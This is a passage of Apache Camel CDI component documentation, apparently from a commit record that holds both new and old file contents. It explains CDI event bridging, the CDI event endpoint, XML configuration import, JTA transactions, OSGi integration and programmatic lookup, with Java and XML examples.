CamelContextStartingEvent event) {\n \/\/ Called before the default Camel context is about to start\n}\n----\n\nAs of Camel 2.18, it is possible to observe events for a particular route (`RouteAddedEvent`,\n`RouteStartedEvent`, `RouteStoppedEvent` and `RouteRemovedEvent`) should it have\nan explicit defined, e.g.:\n\n[source,java]\n----\nfrom(\"...\").routeId(\"foo\").to(\"...\");\n\nvoid onRouteStarted(@Observes @Named(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route \"foo\" has started\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to refine the\nobserver method resolution to a particular Camel context as specified\nin\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], e.g.:\n\n[source,java]\n----\nvoid onRouteStarted(@Observes @ContextName(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route 'event.getRoute()' for the Camel context 'foo' has started\n}\n\u00a0\nvoid onContextStarted(@Observes @Manual CamelContextStartedEvent event) {\n \/\/ Called after the the Camel context qualified with '@Manual' has started\n}\n----\n\nSimilarly, the\u00a0`@Default`\u00a0qualifier can be used to observe Camel events\nfor the\u00a0_default_\u00a0Camel context if multiples contexts exist, e.g.:\n\n[source,java]\n----\nvoid onExchangeCompleted(@Observes @Default ExchangeCompletedEvent event) {\n \/\/ Called after the exchange 'event.getExchange()' processing has completed\n}\n----\n\nIn that example, if no qualifier is specified, the\u00a0`@Any`\u00a0qualifier is\nimplicitly assumed, so that corresponding events for all the Camel\ncontexts get received.\n\nNote that the support for Camel events translation into CDI events is\nonly activated if observer methods listening for Camel events are\ndetected in the deployment, and that per Camel context.\n\n### CDI events endpoint\n\n*Available as of Camel 2.17*\n\nThe CDI event endpoint bridges\nthe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#events[CDI\nevents]\u00a0with the Camel routes so that CDI events can be seamlessly\nobserved \/ consumed (resp. produced \/ fired) from Camel consumers (resp.\nby Camel producers).\n\nThe\u00a0`CdiEventEndpoint<T>`\u00a0bean provided by Camel CDI can be used to\nobserve \/ consume CDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(cdiEventEndpoint).log(\"CDI event received: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:event\")\nProducerTemplate producer;\n\nvoid observeCdiEvents(@Observes String event) {\n producer.sendBody(event);\n}\n\nfrom(\"direct:event\").log(\"CDI event received: ${body}\");\n----\n\nConversely, the\u00a0`CdiEventEndpoint<T>`\u00a0bean can be used to produce \/ fire\nCDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint).log(\"CDI event sent: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\").process(new Processor() {\n @Override\n public void process(Exchange exchange) {\n event.fire(exchange.getBody(String.class));\n }\n}).log(\"CDI event sent: ${body}\");\n----\n\nOr using a Java 8 lambda expression:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\")\n .process(exchange -> event.fire(exchange.getIn().getBody(String.class)))\n .log(\"CDI event sent: ${body}\");\n----\n\nThe type variable\u00a0`T` (resp. the qualifiers) of a\nparticular\u00a0`CdiEventEndpoint<T>`\u00a0injection point are automatically\ntranslated into the parameterized\u00a0_event type_\u00a0(resp. into the\u00a0_event\nqualifiers_)\u00a0e.g.:\n\n[source,java]\n----\n@Inject\n@FooQualifier\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @FooQualifier List<String> event) {\n logger.info(\"CDI event: {}\", event);\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to qualify\nthe\u00a0`CdiEventEndpoint<T>`\u00a0injection points, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\/\/ Only observes \/ consumes events having the @ContextName(\"foo\") qualifier\nfrom(cdiEventEndpoint).log(\"Camel context (foo) > CDI event received: ${body}\");\n\/\/ Produces \/ fires events with the @ContextName(\"foo\") qualifier\nfrom(\"...\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @ContextName(\"foo\") List<String> event) {\n logger.info(\"Camel context (foo) > CDI event: {}\", event);\n}\n----\n\nNote that the CDI event Camel endpoint dynamically adds\nan\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethod]\u00a0for each unique combination of\u00a0_event type_\u00a0and\u00a0_event\nqualifiers_\u00a0and solely relies on the container\ntypesafe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], which leads to an implementation as efficient as possible.\n\nBesides, as the impedance between the\u00a0_typesafe_\u00a0nature of CDI and\nthe\u00a0_dynamic_\u00a0nature of\nthe\u00a0link:http:\/\/camel.apache.org\/component.html[Camel component]\u00a0model is\nquite high, it is not possible to create an instance of the CDI event\nCamel endpoint via\u00a0link:http:\/\/camel.apache.org\/uris.html[URIs]. Indeed, the\nURI format for the CDI event component is:\n\n[source,text]\n----\ncdi-event:\/\/PayloadType<T1,...,Tn>[?qualifiers=QualifierType1[,...[,QualifierTypeN]...]]\n----\n\nWith the authority\u00a0`PayloadType`\u00a0(resp. the\u00a0`QualifierType`) being the\nURI escaped fully qualified name of the payload (resp. qualifier) raw\ntype followed by the type parameters section delimited by angle brackets\nfor payload parameterized type. Which leads to\u00a0_unfriendly_\u00a0URIs,\ne.g.:\n\n[source,text]\n----\ncdi-event:\/\/org.apache.camel.cdi.example.EventPayload%3Cjava.lang.Integer%3E?qualifiers=org.apache.camel.cdi.example.FooQualifier%2Corg.apache.camel.cdi.example.BarQualifier\n----\n\nBut more fundamentally, that would prevent efficient binding between the\nendpoint instances and the observer methods as the CDI container doesn't\nhave any ways of discovering the Camel context model during the\ndeployment phase.\n\n### Camel XML configuration import\n\n*Available as of Camel 2.18*\n\nWhile CDI favors a typesafe dependency injection mechanism, it may be\nuseful\u00a0to reuse existing Camel XML configuration files into a Camel CDI\napplication.\u00a0In other use cases, it might be handy to rely on the Camel\nXML DSL to configure\u00a0its Camel context(s).\n\nYou can use the\u00a0`@ImportResource` annotation that's provided by Camel\nCDI on any CDI beans and Camel CDI will automatically load the Camel XML\nconfiguration at the specified locations, e.g.:\n\n[source,java]\n----\n@ImportResource(\"camel-context.xml\")\nclass MyBean {\n}\n----\n\nCamel CDI will load the resources at the specified locations from the\nclasspath (other protocols may be added in the future).\n\nEvery `CamelContext` elements and other Camel _primitives_ from the\nimported resources are automatically deployed as CDI beans during the\ncontainer bootstrap so that they benefit from the auto-configuration\nprovided by Camel CDI and become available for injection at runtime. If\nsuch an element has an explicit `id` attribute set, the corresponding\nCDI bean is qualified with the `@Named` qualifier, e.g., given the\nfollowing Camel XML configuration:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <endpoint id=\"bar\" uri=\"seda:inbound\">\n <property key=\"queue\" value=\"#queue\"\/>\n <property key=\"concurrentConsumers\" value=\"10\"\/>\n <\/endpoint>\n<camelContext\/>\n----\n\nThe\u00a0corresponding CDI beans are automatically deployed and can be\ninjected, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCamelContext context;\n\n@Inject\n@Named(\"bar\")\nEndpoint endpoint;\n----\n\nNote that the\u00a0`CamelContext`\u00a0beans are automatically qualified with both\nthe\u00a0`@Named`\u00a0and\u00a0`@ContextName`\u00a0qualifiers. If the\nimported\u00a0`CamelContext`\u00a0element doesn't have an\u00a0`id`\u00a0attribute, the\ncorresponding bean is deployed with the built-in\u00a0`@Default`\u00a0qualifier.\n\nConversely, CDI beans deployed in the application can be referred to\nfrom the Camel XML configuration, usually using the\u00a0`ref`\u00a0attribute,\ne.g., given the following bean declared:\n\n[source,java]\n----\n@Produces\n@Named(\"baz\")\nProcessor processor = exchange -> exchange.getIn().setHeader(\"qux\", \"quux\");\n----\n\nA reference to that bean can be declared in the imported Camel XML\nconfiguration, e.g.:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <route>\n <from uri=\"...\"\/>\n <process ref=\"baz\"\/>\n <\/route>\n<camelContext\/>\n----\n\n\n### Transaction support\n\n*Available as of Camel 2.19*\n\nCamel CDI provides support for Camel transactional client using JTA.\n\nThat support is optional hence you need to have JTA in your application classpath, e.g., by explicitly add JTA as a dependency when using Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>javax.transaction<\/groupId>\n <artifactId>javax.transaction-api<\/artifactId>\n <scope>runtime<\/scope>\n<\/dependency>\n----\n\nYou'll have to have your application deployed in a JTA capable container or provide a standalone JTA implementation.\n\n[CAUTION]\n====\nNote that, for the time being, the transaction manager is looked up as JNDI resource with the `java:\/TransactionManager` key.\n\nMore flexible strategies will be added in the future to support a wider range of deployment scenarios.\n====\n\n#### Transaction policies\n\nCamel CDI provides implementation for the typically supported Camel `TransactedPolicy` as CDI beans. It is possible to have these policies looked up by name using the transacted EIP, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .transacted(\"PROPAGATION_REQUIRED\")\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThis would be equivalent to:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Inject\n @Named(\"PROPAGATION_REQUIRED\")\n Policy required;\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .policy(required)\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThe list of supported transaction policy names is:\n\n- `PROPAGATION_NEVER`,\n- `PROPAGATION_NOT_SUPPORTED`,\n- `PROPAGATION_SUPPORTS`,\n- `PROPAGATION_REQUIRED`,\n- `PROPAGATION_REQUIRES_NEW`,\n- `PROPAGATION_NESTED`,\n- `PROPAGATION_MANDATORY`.\n\n#### Transactional error handler\n\nCamel CDI provides a transactional error handler that extends the redelivery error handler, forces a rollback whenever an exception occurs and creates a new transaction for each redelivery.\n\nCamel CDI provides the `CdiRouteBuilder` class that exposes the `transactionErrorHandler` helper method to enable quick access to the configuration, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends CdiRouteBuilder {\n\n @Override\n public void configure() {\n errorHandler(transactionErrorHandler()\n .setTransactionPolicy(\"PROPAGATION_SUPPORTS\")\n .maximumRedeliveries(5)\n .maximumRedeliveryDelay(5000)\n .collisionAvoidancePercent(10)\n .backOffMultiplier(1.5));\n }\n}\n----\n\n\n### Auto-configured OSGi integration\n\n*Available as of Camel 2.17*\n\nThe Camel context beans are automatically adapted by Camel CDI so that\nthey are registered as OSGi services and the various resolvers\n(like\u00a0`ComponentResolver` and\u00a0`DataFormatResolver`) integrate with the\nOSGi registry. That means that the link:karaf.html[Karaf Camel commands]\ncan be used to operate the Camel contexts auto-configured by Camel CDI,\ne.g.:\n\n[source,brush:,text;,gutter:,false;,theme:,Default]\n----\nkaraf@root()> camel:context-list\n Context Status Total # Failed # Inflight # Uptime\n ------- ------ ------- -------- ---------- ------\n camel-cdi Started 1 0 0 1 minute\n----\n\nSee the\u00a0`camel-example-cdi-osgi` example for a working example of the\nCamel CDI OSGi integration.\n\n\n### Lazy Injection \/ Programmatic Lookup\n\nWhile the CDI programmatic model favors a http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#typesafe_resolution[typesafe resolution]\nmechanism that occurs at application initialization time, it is possible to perform\ndynamic \/ lazy injection later during the application execution using the\nhttp:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#programmatic_lookup[programmatic lookup]\nmechanism.\n\nCamel CDI provides for convenience the annotation literals corresponding to the\nCDI qualifiers that you can use for standard injection of Camel primitives.\nThese annotation literals can be used in conjunction with the `javax.enterprise.inject.Instance`\ninterface which is the CDI entry point to perform lazy injection \/ programmatic lookup.\n\nFor example, you can use the provided annotation literal for the `@Uri` qualifier\nto lazily lookup for Camel primitives, e.g. for `ProducerTemplate` beans:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<ProducerTemplate> producers;\n\nProducerTemplate inbound = producers\n .select(Uri.Literal.of(\"direct:inbound\"))\n .get();\n----\n\nOr for `Endpoint` beans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<Endpoint> endpoints;\n\nMockEndpoint outbound = endpoints\n .select(MockEndpoint.class, Uri.Literal.of(\"mock:outbound\"))\n .get();\n----\n\nSimilarly, you can use the provided annotation literal for\nthe `@ContextName` qualifier to lazily lookup for `CamelContext`\nbeans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nCamelContext context = contexts\n .select(ContextName.Literal.of(\"foo\"))\n .get();\n----\n\nYou can also refined the selection based on the Camel context type, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\n\/\/ Refine the selection by type\nInstance<DefaultCamelContext> context = contexts.select(DefaultCamelContext.class);\n\n\/\/ Check if such a bean exists then retrieve a reference\nif (!context.isUnsatisfied())\n context.get();\n----\n\nOr even iterate over a selection of Camel contexts, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nfor (CamelContext context : contexts)\n context.setUseBreadcrumb(true);\n----\n\n\n### Maven Archetype\n\nAmong the available\u00a0link:camel-maven-archetypes.html[Camel Maven\narchetypes], you can use the provided\u00a0`camel-archetype-cdi`\u00a0to generate\na Camel CDI Maven project, e.g.:\n\n[source,bash]\n----\nmvn archetype:generate -DarchetypeGroupId=org.apache.camel.archetypes -DarchetypeArtifactId=camel-archetype-cdi\n----\n\n### Supported containers\n\nThe Camel CDI component is compatible with any CDI 1.0, CDI 1.1 and CDI\n1.2 compliant runtime. It's been successfully tested against the\nfollowing runtimes:\n\n[width=\"100%\",cols=\"2,1m,2\",options=\"header\",]\n|============================================\n|Container |Version |Runtime\n|Weld SE |1.1.28.Final |CDI 1.0 \/ Java SE 7\n|OpenWebBeans |1.2.7 |CDI 1.0 \/ Java SE 7\n|Weld SE |2.4.2.Final |CDI 1.2 \/ Java SE 7\n|OpenWebBeans |1.7.2 |CDI 1.2 \/ Java SE 7\n|WildFly |8.2.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |9.0.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |10.1.0.Final |CDI 1.2 \/ Java EE 7\n|Karaf |2.4.4 |CDI 1.2 \/ OSGi 4 \/ PAX CDI\n|Karaf |3.0.5 |CDI 1.2 \/ OSGi 5 \/ PAX CDI\n|Karaf |4.0.4 |CDI 1.2 \/ OSGi 6 \/ PAX CDI\n|============================================\n\n\n### Examples\n\nThe following examples are available in the `examples` directory of the\nCamel project:\n\n[width=\"100%\",cols=\"1m,3\",options=\"header\",]\n|============================================\n|Example |Description\n\n|camel-example-cdi\n|Illustrates how to work with Camel using CDI to configure components,\nendpoints and beans\n\n|camel-example-cdi-kubernetes\n|Illustrates the integration between Camel, CDI and Kubernetes\n\n|camel-example-cdi-metrics\n|Illustrates the integration between Camel, Dropwizard Metrics and CDI\n\n|camel-example-cdi-properties\n|Illustrates the integration between Camel, DeltaSpike and CDI for\nconfiguration properties\n\n|camel-example-cdi-osgi\n|A\u00a0CDI application using the SJMS component that can be executed\ninside an OSGi container using PAX CDI\n\n|camel-example-cdi-rest-servlet\n|Illustrates the Camel REST DSL being used in a Web application that\nuses CDI as dependency injection framework\n\n|camel-example-cdi-test\n|Demonstrates the testing features that are provided as part of\nthe integration between Camel and CDI\n\n|camel-example-cdi-xml\n|Illustrates the use of Camel XML configuration\nfiles into a Camel CDI application\n\n|camel-example-swagger-cdi\n|An example using REST DSL and Swagger Java with CDI\n\n|camel-example-widget-gadget-cdi\n|The Widget and Gadget use-case from the EIP book implemented\nin Java with CDI dependency Injection\n\n|============================================\n\n### See Also\n\n* link:cdi-testing.html[Camel CDI testing]\n* http:\/\/www.cdi-spec.org[CDI specification Web site]\n* http:\/\/www.cdi-spec.org\/ecosystem\/[CDI ecosystem]\n* http:\/\/weld.cdi-spec.org[Weld home page]\n* http:\/\/openwebbeans.apache.org[OpenWebBeans home page]\n* https:\/\/github.com\/astefanutti\/further-cdi[Going further with CDI and Camel]\n(See Camel CDI section)\n","old_contents":"## Camel CDI\n\nThe Camel CDI component provides auto-configuration for Apache Camel\nusing CDI as dependency injection framework based\non\u00a0_convention-over-configuration_. It auto-detects Camel routes\navailable in the application and provides beans for common Camel\nprimitives like `Endpoint`,\u00a0`FluentProducerTemplate`, `ProducerTemplate` or\u00a0`TypeConverter`. It\nimplements standard link:bean-integration.html[Camel bean integration]\nso that Camel annotations like\u00a0`@Consume`,\u00a0`@Produce`\nand\u00a0`@PropertyInject` can be used seamlessly in CDI beans. Besides, it\nbridges Camel events (e.g. `RouteAddedEvent`,\n`CamelContextStartedEvent`,\u00a0`ExchangeCompletedEvent`, ...) as CDI events\nand provides a CDI events endpoint that can be used to consume \/ produce\nCDI events from \/ to Camel routes.\n\nNOTE: While the Camel CDI component is available as of **Camel 2.10**, it's\nbeen rewritten in *Camel 2.17* to better fit into the CDI programming\nmodel. Hence some of the features like the Camel events to CDI events\nbridge and the CDI events endpoint only apply starting Camel 2.17.\n\nNOTE: More details on how to test Camel CDI applications are available in\nlink:cdi-testing.html[Camel CDI testing].\n\n### Auto-configured Camel context\n\nCamel CDI automatically deploys and configures a\u00a0`CamelContext` bean.\nThat `CamelContext` bean is automatically instantiated, configured and\nstarted (resp. stopped) when the CDI container initializes (resp. shuts\ndown). It can be injected in the application, e.g.:\n\n[source,java]\n----\n@Inject\nCamelContext context;\n----\n\nThat default `CamelContext` bean is qualified with the\nbuilt-in\u00a0`@Default` qualifier, is scoped\u00a0`@ApplicationScoped` and is of\ntype `DefaultCamelContext`.\n\nNote that this bean can be customized programmatically and other Camel\ncontext beans can be deployed in the application as well.\n\n### Auto-detecting Camel routes\n\nCamel CDI automatically\u00a0collects all the\u00a0`RoutesBuilder` beans in the\napplication, instantiates and add them to the `CamelContext` bean\ninstance when the CDI container initializes. For example, adding a Camel\nroute is as simple as declaring a class, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\u00a0\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nNote that you can declare as many\u00a0`RoutesBuilder` beans as you want.\nBesides,\u00a0`RouteContainer` beans are also automatically collected,\ninstantiated and added to the\u00a0`CamelContext` bean instance managed by\nCamel CDI when the container initializes.\n\n*Available as of Camel 2.19*\n\nIn some situations, it may be necessary to disable the auto-configuration of the `RouteBuilder` and `RouteContainer` beans. That can be achieved by observing for the `CdiCamelConfiguration` event, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoConfigureRoutes(false);\n}\n----\n\nSimilarly, it is possible to deactivate the automatic starting of the configured `CamelContext` beans, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoStartContexts(false);\n}\n----\n\n### Auto-configured Camel primitives\n\nCamel CDI provides beans for common Camel primitives that can be\ninjected in any CDI beans, e.g.:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. mock:outbound\n\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n\n@Inject\nTypeConverter converter;\n----\n\n### Camel context configuration\n\nIf you just want to change the name of the default `CamelContext` bean,\nyou can used the `@ContextName` qualifier\u00a0provided by Camel CDI, e.g.:\n\n[source,java]\n----\n@ContextName(\"camel-context\")\nclass MyRouteBean extends RouteBuilder {\n\u00a0\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nElse, if more customization is needed, any\u00a0`CamelContext`\u00a0class can be\nused to declare a custom Camel context bean. Then,\nthe\u00a0`@PostConstruct`\u00a0and\u00a0`@PreDestroy`\u00a0lifecycle callbacks can be done\nto do the customization, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass CustomCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void customize() {\n \/\/ Set the Camel context name\n setName(\"custom\");\n \/\/ Disable JMX\n disableJMX();\n }\n\n @PreDestroy\n void cleanUp() {\n \/\/ ...\n }\n}\n----\n\nlink:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_method[Producer]\nand\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#disposer_method[disposer]\nmethods can also be used as well to customize the Camel context bean, e.g.:\n\n[source,java]\n----\nclass CamelContextFactory {\n\n @Produces\n @ApplicationScoped\n CamelContext customize() {\n DefaultCamelContext context = new DefaultCamelContext();\n context.setName(\"custom\");\n return context;\n }\n\n void cleanUp(@Disposes CamelContext context) {\n \/\/ ...\n }\n}\n----\n\nSimilarly,\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_field[producer\nfields]\u00a0can be used, e.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\nCamelContext context = new CustomCamelContext();\n\nclass CustomCamelContext extends DefaultCamelContext {\n\n CustomCamelContext() {\n setName(\"custom\");\n }\n}\n----\n\nThis pattern can be used for example to avoid having the Camel context\nroutes started automatically when the container initializes by calling\nthe\u00a0`setAutoStartup`\u00a0method, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass ManualStartupCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void manual() {\n setAutoStartup(false);\n }\n}\n----\n\n### Multiple Camel contexts\n\nAny number of `CamelContext` beans can actually be declared in the\napplication as documented above. In that case, the CDI qualifiers\ndeclared on these `CamelContext` beans are used to bind the Camel routes\nand other Camel primitives to the corresponding Camel contexts. From\nexample, if the following beans get declared:\n\n[source,java]\n----\n@ApplicationScoped\n@ContextName(\"foo\")\nclass FooCamelContext extends DefaultCamelContext {\n}\n\n@ApplicationScoped\n@BarContextQualifier\nclass BarCamelContext extends DefaultCamelContext {\n}\n\u00a0\n@ContextName(\"foo\")\nclass RouteAddedToFooCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@BarContextQualifier\nclass RouteAddedToBarCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@ContextName(\"baz\")\nclass RouteAddedToBazCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@MyOtherQualifier\nclass RouteNotAddedToAnyCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n----\n\nThe\u00a0`RoutesBuilder` beans qualified with\u00a0`@ContextName` are\nautomatically added to the corresponding `CamelContext` beans by Camel\nCDI. If no such `CamelContext` bean exists, it gets automatically\ncreated, as for the `RouteAddedToBazCamelContext` bean. Note this only\nhappens for the\u00a0`@ContextName`\u00a0qualifier provided by Camel CDI. Hence\nthe\u00a0`RouteNotAddedToAnyCamelContext` bean qualified with the\nuser-defined\u00a0`@MyOtherQualifier`\u00a0qualifier does not get added to any\nCamel contexts. That may be useful, for example, for Camel routes that\nmay be required to be added later during the application execution.\n\nNOTE: Since Camel version 2.17.0, Camel CDI is capable of managing any kind of\n`CamelContext` beans (e.g. `DefaultCamelContext`). In previous versions,\nit is only capable of managing beans of type `CdiCamelContext` so it is\nrequired to extend it.\n\nThe CDI qualifiers declared on the\u00a0`CamelContext`\u00a0beans are also used to\nbind the corresponding Camel primitives, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\n@BarContextQualifier\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. mock:outbound\n\n@Inject\n@ContextName(\"baz\")\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n### Configuration properties\n\nTo configure the sourcing of the configuration properties used by Camel\nto resolve properties placeholders, you can declare\na\u00a0`PropertiesComponent`\u00a0bean qualified with `@Named(\"properties\")`,\ne.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent propertiesComponent() {\n Properties properties = new Properties();\n properties.put(\"property\", \"value\");\n PropertiesComponent component = new PropertiesComponent();\n component.setInitialProperties(properties);\n component.setLocation(\"classpath:placeholder.properties\");\n return component;\n}\n----\n\nIf you want to\nuse\u00a0link:http:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]\u00a0you can declare the\nfollowing\u00a0`PropertiesComponent` bean:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent properties(PropertiesParser parser) {\n PropertiesComponent component = new PropertiesComponent();\n component.setPropertiesParser(parser);\n return component;\n}\n\n\/\/ PropertiesParser bean that uses DeltaSpike to resolve properties\nstatic class DeltaSpikeParser extends DefaultPropertiesParser {\n @Override\n public String parseProperty(String key, String value, Properties properties) {\n return ConfigResolver.getPropertyValue(key);\n }\n}\n----\n\nYou can see the\u00a0`camel-example-cdi-properties` example for a working\nexample of a Camel CDI application using DeltaSpike configuration\nmechanism.\n\n### Auto-configured type converters\n\nCDI beans annotated with the\u00a0`@Converter`\u00a0annotation are automatically\nregistered into the deployed Camel contexts, e.g.:\n\n[source,java]\n----\n@Converter\npublic class MyTypeConverter {\n\n @Converter\n public Output convert(Input input) {\n \/\/...\n }\n}\n----\n\nNote that CDI injection is supported within the type converters.\n\n### Camel bean integration\n\n#### Camel annotations\n\nAs part of the Camel\u00a0link:http:\/\/camel.apache.org\/bean-integration.html[bean\nintegration],\u00a0Camel comes with a set\nof\u00a0link:http:\/\/camel.apache.org\/bean-integration.html#BeanIntegration-Annotations[annotations]\u00a0that\nare seamlessly supported by Camel CDI. So you can use any of these\nannotations in your CDI beans, e.g.:\n\n[width=\"100%\",cols=\"1,2a,2a\",options=\"header\",]\n|=======================================================================\n|\u00a0 |Camel annotation |CDI equivalent\n|Configuration property a|\n[source,java]\n----\n@PropertyInject(\"key\")\nString value;\n----\n\n a|\nIf using\nhttp:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]:\n\n[source,java]\n----\n@Inject\n@ConfigProperty(name = \"key\")\nString value;\n----\n\nSee link:cdi.html[configuration properties] for more details.\n\n|Producer template injection (default Camel context) a|\n[source,java]\n----\n@Produce(uri = \"mock:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"mock:outbound\")\nFluentProducerTemplate producer;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"direct:outbound\")\nFluentProducerTemplate producer;\n----\n\n|Endpoint injection (default Camel context) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\")\nEndpoint endpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n|Endpoint injection (Camel context by name) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\",\n context = \"foo\")\nEndpoint contextEndpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nEndpoint contextEndpoint;\n----\n\n|Bean injection (by type) a|\n[source,java]\n----\n@BeanInject\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\nMyBean bean;\n----\n\n|Bean injection (by name) a|\n[source,java]\n----\n@BeanInject(\"foo\")\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Named(\"foo\")\nMyBean bean;\n----\n\n|POJO consuming a|\n[source,java]\n----\n@Consume(uri = \"seda:inbound\")\nvoid consume(@Body String body) {\n \/\/...\n}\n----\n\n |\u00a0\n|=======================================================================\n\n#### Bean component\n\nYou can refer to CDI beans, either by type or name, From the Camel DSL,\ne.g. with the Java Camel DSL:\n\n[source,java]\n----\nclass MyBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(MyBean.class);\n----\n\nOr to lookup a CDI bean by name from the Java DSL:\n\n[source,java]\n----\n@Named(\"foo\")\nclass MyNamedBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(\"foo\");\n----\n\n#### Referring beans from Endpoint URIs\n\nWhen configuring endpoints using the URI syntax you can refer to beans\nin the\u00a0link:registry.html[Registry]\u00a0using the `#` notation.\u00a0If the URI\nparameter value starts with a\u00a0`#`\u00a0sign then Camel CDI will lookup\u00a0for a\nbean of the given type by name, e.g.:\n\n[source,java]\n----\nfrom(\"jms:queue:{{destination}}?transacted=true&transactionManager=#jtaTransactionManager\").to(\"...\");\n----\n\nHaving the following 